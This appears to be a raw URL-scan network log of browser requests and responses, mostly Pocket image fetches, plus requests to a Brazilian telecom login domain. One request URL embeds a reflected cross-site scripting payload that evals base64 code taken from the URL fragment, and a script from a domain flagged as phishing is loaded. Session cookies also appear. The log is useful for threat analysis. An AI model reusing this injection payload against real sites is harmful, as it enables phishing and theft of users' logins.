Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 7632
x-amzn-requestid: 2b3de800-a50f-4872-8a7c-54ec33923739
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bjzJYFCdIAMFmLQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6371656f-1ee2b3f21d22619e3381e1a4;Sampled=0
x-amzn-remapped-date: Sun, 13 Nov 2022 21:45:19 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: Dr0oeNxvib4qjo6CAg6YPyXkypbU5eF6GLLK1mN3jJer6G22pE8jLQ==
via: 1.1 d83ae0e1ba84e92e58bc1efc23a0c652.cloudfront.net (CloudFront), 1.1 89791e6b21b9a30cc51cac1bc51cf098.cloudfront.net (CloudFront), 1.1 google
date: Sun, 13 Nov 2022 22:01:14 GMT
age: 22529
etag: "d4ac19f0373649804e9747b30552897a453db42d"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F0c41c5f7-45fd-4952-b779-caaaef2b43ff.jpeg
34.120.237.76200 OK 11 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F0c41c5f7-45fd-4952-b779-caaaef2b43ff.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 179204c4982b4bf381897d3c2c3dea1c
776b482a3c0c61950ffe838decfb1384225f514a
5e66f04013c2a7e2cef32a50c0d409dc2911b31a412aa81346b7d65e16f4a6f6
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F0c41c5f7-45fd-4952-b779-caaaef2b43ff.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 11224
x-amzn-requestid: 4191c827-2bbf-4e08-b16a-aa7bd5616ecb
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bjydBHMwIAMF63A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63716453-169dcbf913baf8c67bd9f3d5;Sampled=0
x-amzn-remapped-date: Sun, 13 Nov 2022 21:40:35 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 40ZsYE0GZNGo7Xf6eXk7OFwqq6UpZT3csZPtNGmHpfZrso9fMXTvRQ==
via: 1.1 000f4a2f631bace380a0afa747a82482.cloudfront.net (CloudFront), 1.1 707e733794d52100fde0ab21bf0b1462.cloudfront.net (CloudFront), 1.1 google
date: Sun, 13 Nov 2022 22:01:14 GMT
age: 22529
etag: "776b482a3c0c61950ffe838decfb1384225f514a"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd37ec5c0-8297-45c8-9552-5d310e07e034.jpeg
34.120.237.76200 OK 12 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd37ec5c0-8297-45c8-9552-5d310e07e034.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 6828ea3bf0f42867717e1ef95c398d02
13907043e5ff59dea9b9f0130b5079779b6fdda9
d990c2fab7762c251a7f4b10ca052704fd94faea54ff4596a9e4a5fdf51480e6
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd37ec5c0-8297-45c8-9552-5d310e07e034.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 11716
x-amzn-requestid: 28b42f16-f75b-4ddc-a3ab-4b88fda932b8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bjyDtG8IIAMFs0Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637163b1-62ab3858218912ec32b8df06;Sampled=0
x-amzn-remapped-date: Sun, 13 Nov 2022 21:37:53 GMT
x-amz-cf-pop: SEA73-P2, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: ylUFn0zALrUeJzA13sYlGytX_3VkuoDPkpADHuGw85jVbA8NpUfcHw==
via: 1.1 7f06047c304d80ea094816a27c933914.cloudfront.net (CloudFront), 1.1 707e733794d52100fde0ab21bf0b1462.cloudfront.net (CloudFront), 1.1 google
date: Sun, 13 Nov 2022 22:20:36 GMT
etag: "13907043e5ff59dea9b9f0130b5079779b6fdda9"
content-type: image/jpeg
age: 21367
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F92501a28-163f-4c6e-aed7-d31c29354d1e.jpeg
34.120.237.76200 OK 12 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F92501a28-163f-4c6e-aed7-d31c29354d1e.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 032386e5c9dffff1ba1ee5e8a322d438
dd4fd6c803a9b333bace9a541c6bd183d0c56bb9
0e9f559a0aa7e114c5810a27ba243c0da7b44dc0bf7aec2b7ab32b8f0e2b536c
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F92501a28-163f-4c6e-aed7-d31c29354d1e.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 11667
x-amzn-requestid: 4778d1bd-28c3-4665-89da-046e356087f0
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bjyD1HE-oAMF0QQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637163b1-53c7330c5fd36d3c4d9e6aed;Sampled=0
x-amzn-remapped-date: Sun, 13 Nov 2022 21:37:53 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: ubqvgLaJlGIxyJC1KBJP4ncx_2ltXS0C5dLGddjtbkt6pJmX84_VAg==
via: 1.1 e5af640ced3aa8764b82c4bc3f7af38e.cloudfront.net (CloudFront), 1.1 1508efc4152aa1778ed4adecb328b374.cloudfront.net (CloudFront), 1.1 google
date: Sun, 13 Nov 2022 21:54:01 GMT
age: 22962
etag: "dd4fd6c803a9b333bace9a541c6bd183d0c56bb9"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Feaa09e64-5032-43a4-b8f1-ac7a4c391ce2.jpeg
34.120.237.76200 OK 11 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Feaa09e64-5032-43a4-b8f1-ac7a4c391ce2.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 6f7c39108d3a61b6eaa3c7d8529f0ea0
a7a24b45563599abd1badffeffb965e6a9586f07
0dc12de0ae756b662448214eaa933aef9366404659585692730fa952b63e610f
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Feaa09e64-5032-43a4-b8f1-ac7a4c391ce2.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 10876
x-amzn-requestid: 916d129e-b6ca-4e4d-9818-67591d11c76c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bjybzGdDIAMF4Cw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6371644b-2f59bbb45dad57bc70c780b4;Sampled=0
x-amzn-remapped-date: Sun, 13 Nov 2022 21:40:27 GMT
x-amz-cf-pop: SEA19-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: yhREIc3lmibj7EIUHeUhT-665yL20HkK5wPTfdLcIgaDq8_DjwwSEw==
via: 1.1 b4085435efbe95a420f374958bd145be.cloudfront.net (CloudFront), 1.1 1481cc55c02c3a782ad420b6bac2cb32.cloudfront.net (CloudFront), 1.1 google
date: Sun, 13 Nov 2022 21:53:07 GMT
age: 23016
etag: "a7a24b45563599abd1badffeffb965e6a9586f07"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
auth3.tim.com.br/OTP/imgs/loading.gif
45.60.65.22200 OK 23 kB URL HTTP/2 auth3.tim.com.br/OTP/imgs/loading.gif
IP 45.60.65.22:0
File type GIF image data, version 89a, 100 x 100\012- data
Hash 6f1ef1483f165ef21c3975357b2a3709
f5635ca704c992860978396547a6dc2e68ca5d21
3e75a6774ef7041083d556b2f83a816acdd398eff6add8c1867c0cea9ddf6d4b
GET /OTP/imgs/loading.gif HTTP/1.1
Host: auth3.tim.com.br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Mon, 14 Nov 2022 04:16:43 GMT
server: Apache
last-modified: Wed, 31 Aug 2016 14:46:24 GMT
etag: "1742a6-5992-53b5f2946f000"
accept-ranges: bytes
content-length: 22930
content-type: image/gif
set-cookie: tim_cookie=rd51o00000000000000000000ffff0aa91fdeo20101; expires=Mon, 14-Nov-2022 05:16:43 GMT; path=/; Httponly; Secure
visid_incap_2787765=5fRYwnpZRlWaTacuZAb86inBcWMAAAAAQUIPAAAAAABbdb8vo/ujoNQUHQK1m1SG; expires=Tue, 14 Nov 2023 00:25:18 GMT; HttpOnly; path=/; Domain=.tim.com.br
incap_ses_721_2787765=D8K8dyiyv3cpuyia8YEBCivBcWMAAAAASArDP8VVMp+QEpJxDcp/JQ==; path=/; Domain=.tim.com.br
x-cdn: Imperva
x-iinfo: 3-5173091-5173099 NNNN CT(279 835 0) RT(1668399401964 27) q(0 0 12 2) r(15 15) U5
X-Firefox-Spdy: h2
qua7ar.space/3423-BR-uu/m1.js
45.90.58.68200 OK 2.6 kB URL HTTP/1.1 qua7ar.space/3423-BR-uu/m1.js
IP 45.90.58.68:0
ASN #204957 Green Floid LLC
File type HTML document, ASCII text, with very long lines (483)
Hash 8fc1984675e129aaecbb74d9dbf0722c
a1aeb4e7f32ba5d4cf07b2360803a102cc26e187
4c00f403a23056b713a6593a9ce385f3910d07aed255b4b5d991a2973ed0e4e4
Analyzer Verdict Alert fortinet Phishing
GET /3423-BR-uu/m1.js HTTP/1.1
Host: qua7ar.space
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 14 Nov 2022 04:16:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 31 Oct 2022 10:28:14 GMT
ETag: "29b6-5ec5210a89802-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2607
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/javascript
auth3.tim.com.br/OTP/imgs/favicon.ico
45.60.65.22200 OK 15 kB URL HTTP/2 auth3.tim.com.br/OTP/imgs/favicon.ico
IP 45.60.65.22:0
File type MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel\012- data
Hash 8730677dedeabbe34b23d593b31d1d35
f5d6ee2313c25f8a2c116a4566c886a42fe8fd44
4fc1c3754d67a16c5ad1168d491f4f31ff300675cb651ef335954988ca5d899b
GET /OTP/imgs/favicon.ico HTTP/1.1
Host: auth3.tim.com.br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://auth3.tim.com.br/
Cookie: visid_incap_2787765=5fRYwnpZRlWaTacuZAb86inBcWMAAAAAQUIPAAAAAABbdb8vo/ujoNQUHQK1m1SG; incap_ses_721_2787765=ImzmaYebpSkpuyia8YEBCivBcWMAAAAAzOvDyFU99MRfO0lQ+QsfLA==; tim_cookie=rd51o00000000000000000000ffff0aa91fdeo20101
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Mon, 14 Nov 2022 04:16:45 GMT
server: Apache
last-modified: Wed, 17 Aug 2016 18:18:17 GMT
etag: "42801-3aee-53a487d40ac40"
accept-ranges: bytes
content-length: 15086
content-type: image/x-icon
set-cookie: tim_cookie=rd51o00000000000000000000ffff0aa91ff6o20101; expires=Mon, 14-Nov-2022 05:16:45 GMT; path=/; Httponly; Secure
x-cdn: Imperva
x-iinfo: 3-5173091-5173100 PNNN RT(1668399401964 2390) q(0 0 0 -1) r(3 3) U5
X-Firefox-Spdy: h2
auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
45.60.65.22200 OK 3.4 kB URL HTTP/1.1 auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
IP 45.60.65.22:0
Hash ebf527a30a3aa45d44d5ae4939a3cced
6f70f574012827ff30dea1853d7f4c9a0e6ae4ec
e29398cdcc1e1712614b4869a4e33c79bb6bfc86d542c9064aa4032f1ab5423b
GET /v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2 HTTP/1.1
Host: auth3.tim.com.br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: JSESSIONID=RJJ0Wo2qNG-BpoLuZNTMb0FbCPl_WXNuN8iWOP7mrVnyLROoqnn9!309010982; visid_incap_2787765=5fRYwnpZRlWaTacuZAb86inBcWMAAAAAQUIPAAAAAABbdb8vo/ujoNQUHQK1m1SG; incap_ses_721_2787765=ImzmaYebpSkpuyia8YEBCivBcWMAAAAAzOvDyFU99MRfO0lQ+QsfLA==
HTTP/1.1 200 OK
Date: Mon, 14 Nov 2022 04:16:45 GMT
Server: Apache
Content-Language: en-US
Keep-Alive: timeout=4, max=799
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
X-CDN: Imperva
Content-Encoding: gzip
X-Iinfo: 7-7593244-7593245 SNYN RT(1668399401330 3253) q(0 1 1 -1) r(3 3) U5
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F7c599387-a493-4fa1-8597-1dfa05785e08.webp
34.120.237.76200 OK 7.1 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F7c599387-a493-4fa1-8597-1dfa05785e08.webp
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash ac5d1b1c5472d6083f42aa57dca4b76b
20265497926ce977139af012c3677d602f5aa72f
da8af50a64a8a18cd22faab0db15333eda4a75204fc5359f307bbc5df04c1a7d
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F7c599387-a493-4fa1-8597-1dfa05785e08.webp HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
server: nginx
content-length: 7052
x-amzn-requestid: dd0441aa-ca29-415d-b5b2-04f91238e02a
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bjyDwHrHoAMF_ZA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637163b1-119c3df5252db7f401180a13;Sampled=0
x-amzn-remapped-date: Sun, 13 Nov 2022 21:37:53 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 6_8aRR4yGijFConA6hFZ7rPC-Y4ucR2WkHsKEugfhlDP49cCTvpUUg==
via: 1.1 e5af640ced3aa8764b82c4bc3f7af38e.cloudfront.net (CloudFront), 1.1 2ab6211e66998c8b58132661a7e3cade.cloudfront.net (CloudFront), 1.1 google
date: Sun, 13 Nov 2022 21:52:56 GMT
age: 23034
etag: "20265497926ce977139af012c3677d602f5aa72f"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
auth3.tim.com.br/OTP/css/TIM-Login-styles-sheet.css
45.60.65.22200 OK 0 B URL HTTP/2 auth3.tim.com.br/OTP/css/TIM-Login-styles-sheet.css
IP 45.60.65.22:0
GET /OTP/css/TIM-Login-styles-sheet.css HTTP/1.1
Host: auth3.tim.com.br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://auth3.tim.com.br/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Mon, 14 Nov 2022 04:16:43 GMT
server: Apache
last-modified: Thu, 04 May 2017 03:57:51 GMT
etag: "428b8-539a-54eaac6d7edc0"
accept-ranges: bytes
content-type: text/css
set-cookie: tim_cookie=rd51o00000000000000000000ffff0aa91ff5o20101; expires=Mon, 14-Nov-2022 05:16:43 GMT; path=/; Httponly; Secure
visid_incap_2787765=5fRYwnpZRlWaTacuZAb86inBcWMAAAAAQUIPAAAAAABbdb8vo/ujoNQUHQK1m1SG; expires=Tue, 14 Nov 2023 00:25:18 GMT; HttpOnly; path=/; Domain=.tim.com.br
incap_ses_721_2787765=au4Oagbqn0Ypuyia8YEBCivBcWMAAAAAlYRUmk6wgbfCAfjrOcBY/g==; path=/; Domain=.tim.com.br
x-cdn: Imperva
content-encoding: gzip
x-iinfo: 3-5173091-5173094 NNYN CT(243 729 0) RT(1668399401964 23) q(0 0 10 0) r(13 13) U5
X-Firefox-Spdy: h2
auth3.tim.com.br/OTP/js/jquery.min.js
45.60.65.22200 OK 0 B URL HTTP/2 auth3.tim.com.br/OTP/js/jquery.min.js
IP 45.60.65.22:0
GET /OTP/js/jquery.min.js HTTP/1.1
Host: auth3.tim.com.br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://auth3.tim.com.br/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Mon, 14 Nov 2022 04:16:43 GMT
server: Apache
last-modified: Tue, 13 Sep 2016 17:46:50 GMT
etag: "42851-17b8b-53c67327e7680"
accept-ranges: bytes
content-type: application/javascript
set-cookie: tim_cookie=rd51o00000000000000000000ffff0aa91ff6o20101; expires=Mon, 14-Nov-2022 05:16:43 GMT; path=/; Httponly; Secure
visid_incap_2787765=5fRYwnpZRlWaTacuZAb86inBcWMAAAAAQUIPAAAAAABbdb8vo/ujoNQUHQK1m1SG; expires=Tue, 14 Nov 2023 00:25:18 GMT; HttpOnly; path=/; Domain=.tim.com.br
incap_ses_721_2787765=wMzqDANpuxIpuyia8YEBCivBcWMAAAAA/4cDmJMVvFjiVk33xXAjHw==; path=/; Domain=.tim.com.br
x-cdn: Imperva
content-encoding: gzip
x-iinfo: 3-5173091-5173100 NNYN CT(243 730 0) RT(1668399401964 30) q(0 0 10 1) r(13 13) U5
X-Firefox-Spdy: h2
auth3.tim.com.br/OTP/js/jquery.mask.min.js
45.60.65.22200 OK 0 B URL HTTP/2 auth3.tim.com.br/OTP/js/jquery.mask.min.js
IP 45.60.65.22:0
GET /OTP/js/jquery.mask.min.js HTTP/1.1
Host: auth3.tim.com.br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://auth3.tim.com.br/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Mon, 14 Nov 2022 04:16:43 GMT
server: Apache
last-modified: Mon, 12 Sep 2016 11:15:48 GMT
etag: "1742cd-1788-53c4d9e356100"
accept-ranges: bytes
content-type: application/javascript
set-cookie: tim_cookie=rd51o00000000000000000000ffff0aa91fdeo20101; expires=Mon, 14-Nov-2022 05:16:43 GMT; path=/; Httponly; Secure
visid_incap_2787765=5fRYwnpZRlWaTacuZAb86inBcWMAAAAAQUIPAAAAAABbdb8vo/ujoNQUHQK1m1SG; expires=Tue, 14 Nov 2023 00:25:18 GMT; HttpOnly; path=/; Domain=.tim.com.br
incap_ses_721_2787765=MpF8C+PCgAUpuyia8YEBCivBcWMAAAAA681jFAxBAAqWJFMSU7MVIg==; path=/; Domain=.tim.com.br
x-cdn: Imperva
content-encoding: gzip
x-iinfo: 3-5173091-5173102 NNYN CT(242 731 0) RT(1668399401964 33) q(0 1 10 0) r(13 13) U5
X-Firefox-Spdy: h2
auth3.tim.com.br/OTP/js/jquery.bxslider.min.js
